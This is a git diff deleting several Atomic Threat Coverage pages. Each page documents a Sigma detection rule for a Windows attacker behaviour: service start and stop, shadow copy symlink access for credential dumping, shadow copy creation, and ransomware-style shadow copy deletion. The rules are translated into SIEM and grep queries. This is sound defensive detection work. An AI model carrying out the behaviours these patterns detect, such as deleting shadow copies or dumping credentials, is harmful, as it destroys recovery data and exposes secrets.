-| **ATT&amp;CK Technique** | <ul><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrator or user executes a service for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>attack.t1569.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Service Execution
-id: 2a072a96-a086-49fa-bcb5-15cc5a619093
-status: experimental
-description: Detects manual service execution (start) via system utilities
-author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression 
-    condition: selection
-falsepositives:
-    - Legitimate administrator or user executes a service for legitimate reason
-level: low
-tags:
-    - attack.execution
-    - attack.t1035
-    - attack.t1569.002
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.* start .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*\ start\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2a072a96-a086-49fa-bcb5-15cc5a619093 <<EOF
-{
-  "metadata": {
-    "title": "Service Execution",
-    "description": "Detects manual service execution (start) via system utilities",
-    "tags": [
-      "attack.execution",
-      "attack.t1035",
-      "attack.t1569.002"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*\\ start\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*\\ start\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Service Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:* start *)
-```
-
-
-### splunk
-    
-```
-((Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="* start *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine="* start *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*.* start .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_service_stop.md b/Atomic_Threat_Coverage/Detection_Rules/win_service_stop.md
deleted file mode 100644
index cbae217..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_service_stop.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Stop Windows Service       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a windows service to be stopped |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0040: Impact](https://attack.mitre.org/tactics/TA0040)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1489: Service Stop](https://attack.mitre.org/techniques/T1489)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1489: Service Stop](../Triggers/T1489.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Administrator shutting down the service due to upgrade or removal purposes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Jakob Weinzettl, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Stop Windows Service
-id: eb87818d-db5d-49cc-a987-d5da331fbd90
-description: Detects a windows service to be stopped
-status: experimental
-author: Jakob Weinzettl, oscd.community
-date: 2019/10/23
-modified: 2019/11/08
-tags:
-    - attack.impact
-    - attack.t1489
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith:
-            - '\sc.exe'
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains: 'stop'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Administrator shutting down the service due to upgrade or removal purposes
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\sc.exe" -or $_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.*stop.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\sc.exe OR *\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*stop*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/eb87818d-db5d-49cc-a987-d5da331fbd90 <<EOF
-{
-  "metadata": {
-    "title": "Stop Windows Service",
-    "description": "Detects a windows service to be stopped",
-    "tags": [
-      "attack.impact",
-      "attack.t1489"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\sc.exe OR *\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*stop*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\sc.exe OR *\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*stop*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Stop Windows Service'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\sc.exe *\\net.exe *\\net1.exe) AND CommandLine.keyword:*stop*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\sc.exe" OR Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="*stop*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\sc.exe", "*\\net.exe", "*\\net1.exe"] CommandLine="*stop*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\sc\.exe|.*.*\net\.exe|.*.*\net1\.exe))(?=.*.*stop.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_access_symlink.md b/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_access_symlink.md
deleted file mode 100644
index de655e1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_access_symlink.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Shadow Copies Access via Symlink       |
-|:-------------------------|:------------------|
-| **Description**          | Shadow Copies storage symbolic link creation using operating systems utilities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrator working with shadow copies, access for backup purposes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Shadow Copies Access via Symlink
-id: 40b19fa6-d835-400c-b301-41f3a2baacaf
-description: Shadow Copies storage symbolic link creation using operating systems utilities
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all:
-            - mklink
-            - HarddiskVolumeShadowCopy
-    condition: selection
-falsepositives:
-    - Legitimate administrator working with shadow copies, access for backup purposes
-status: experimental
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*mklink.*" -and $_.message -match "CommandLine.*.*HarddiskVolumeShadowCopy.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*mklink* AND winlog.event_data.CommandLine.keyword:*HarddiskVolumeShadowCopy*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/40b19fa6-d835-400c-b301-41f3a2baacaf <<EOF
-{
-  "metadata": {
-    "title": "Shadow Copies Access via Symlink",
-    "description": "Shadow Copies storage symbolic link creation using operating systems utilities",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.003"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*mklink* AND winlog.event_data.CommandLine.keyword:*HarddiskVolumeShadowCopy*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*mklink* AND winlog.event_data.CommandLine.keyword:*HarddiskVolumeShadowCopy*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Shadow Copies Access via Symlink'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*mklink* AND CommandLine.keyword:*HarddiskVolumeShadowCopy*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*mklink*" CommandLine="*HarddiskVolumeShadowCopy*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*mklink*" CommandLine="*HarddiskVolumeShadowCopy*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*mklink.*)(?=.*.*HarddiskVolumeShadowCopy.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_creation.md
deleted file mode 100644
index f30c157..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_creation.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Shadow Copies Creation Using Operating Systems Utilities       |
-|:-------------------------|:------------------|
-| **Description**          | Shadow Copies creation using operating systems utilities, possible credential access |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrator working with shadow copies, access for backup purposes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li><li>[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Shadow Copies Creation Using Operating Systems Utilities
-id: b17ea6f7-6e90-447e-a799-e6c0a493d6ce
-description: Shadow Copies creation using operating systems utilities, possible credential access
-author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\powershell.exe'
-            - '\wmic.exe'
-            - '\vssadmin.exe'
-        CommandLine|contains|all:
-            - shadow
-            - create
-    condition: selection
-falsepositives:
-    - Legitimate administrator working with shadow copies, access for backup purposes
-status: experimental
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\vssadmin.exe") -and $_.message -match "CommandLine.*.*shadow.*" -and $_.message -match "CommandLine.*.*create.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\powershell.exe OR *\\wmic.exe OR *\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*create*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b17ea6f7-6e90-447e-a799-e6c0a493d6ce <<EOF
-{
-  "metadata": {
-    "title": "Shadow Copies Creation Using Operating Systems Utilities",
-    "description": "Shadow Copies creation using operating systems utilities, possible credential access",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002",
-      "attack.t1003.003"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\wmic.exe OR *\\\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*create*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\wmic.exe OR *\\\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*create*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Shadow Copies Creation Using Operating Systems Utilities'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\powershell.exe *\\wmic.exe *\\vssadmin.exe) AND CommandLine.keyword:*shadow* AND CommandLine.keyword:*create*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\powershell.exe" OR Image="*\\wmic.exe" OR Image="*\\vssadmin.exe") CommandLine="*shadow*" CommandLine="*create*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\powershell.exe", "*\\wmic.exe", "*\\vssadmin.exe"] CommandLine="*shadow*" CommandLine="*create*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\powershell\.exe|.*.*\wmic\.exe|.*.*\vssadmin\.exe))(?=.*.*shadow.*)(?=.*.*create.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_deletion.md b/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_deletion.md
deleted file mode 100644
index 88d2e84..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_shadow_copies_deletion.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Shadow Copies Deletion Using Operating Systems Utilities       |
-|:-------------------------|:------------------|
-| **Description**          | Shadow Copies deletion using operating systems utilities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0040: Impact](https://attack.mitre.org/tactics/TA0040)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1490: Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1490: Inhibit System Recovery](../Triggers/T1490.md)</li><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li><li>[https://blog.talosintelligence.com/2017/05/wannacry.html](https://blog.talosintelligence.com/2017/05/wannacry.html)</li><li>[https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/)</li><li>[https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/](https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/)</li><li>[https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100](https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Shadow Copies Deletion Using Operating Systems Utilities
-id: c947b146-0abc-4c87-9c64-b17e9d7274a2
-status: stable
-description: Shadow Copies deletion using operating systems utilities
-author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-    - https://blog.talosintelligence.com/2017/05/wannacry.html
-    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
-    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
-    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-tags:
-    - attack.defense_evasion
-    - attack.impact
-    - attack.t1070
-    - attack.t1490
-    - attack.t1551
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\powershell.exe'
-            - '\wmic.exe'
-            - '\vssadmin.exe'
-        CommandLine|contains|all:
-            - shadow  # will mach "delete shadows" and "shadowcopy delete"
-            - delete
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\vssadmin.exe") -and $_.message -match "CommandLine.*.*shadow.*" -and $_.message -match "CommandLine.*.*delete.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\powershell.exe OR *\\wmic.exe OR *\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*delete*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c947b146-0abc-4c87-9c64-b17e9d7274a2 <<EOF
-{
-  "metadata": {
-    "title": "Shadow Copies Deletion Using Operating Systems Utilities",
-    "description": "Shadow Copies deletion using operating systems utilities",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.impact",
-      "attack.t1070",
-      "attack.t1490",
-      "attack.t1551"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\wmic.exe OR *\\\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*delete*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\wmic.exe OR *\\\\vssadmin.exe) AND winlog.event_data.CommandLine.keyword:*shadow* AND winlog.event_data.CommandLine.keyword:*delete*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Shadow Copies Deletion Using Operating Systems Utilities'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\powershell.exe *\\wmic.exe *\\vssadmin.exe) AND CommandLine.keyword:*shadow* AND CommandLine.keyword:*delete*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\powershell.exe" OR Image="*\\wmic.exe" OR Image="*\\vssadmin.exe") CommandLine="*shadow*" CommandLine="*delete*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\powershell.exe", "*\\wmic.exe", "*\\vssadmin.exe"] CommandLine="*shadow*" CommandLine="*delete*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\powershell\.exe|.*.*\wmic\.exe|.*.*\vssadmin\.exe))(?=.*.*shadow.*)(?=.*.*delete.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_shell_spawn_susp_program.md b/Atomic_Threat_Coverage/Detection_Rules/win_shell_spawn_susp_program.md
deleted file mode 100644
index 151cab4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_shell_spawn_susp_program.md
+++ /dev/null
@@ -1,198 +0,0 @@
-| Title                    | Windows Shell Spawning Suspicious Program       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious child process of a Windows shell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
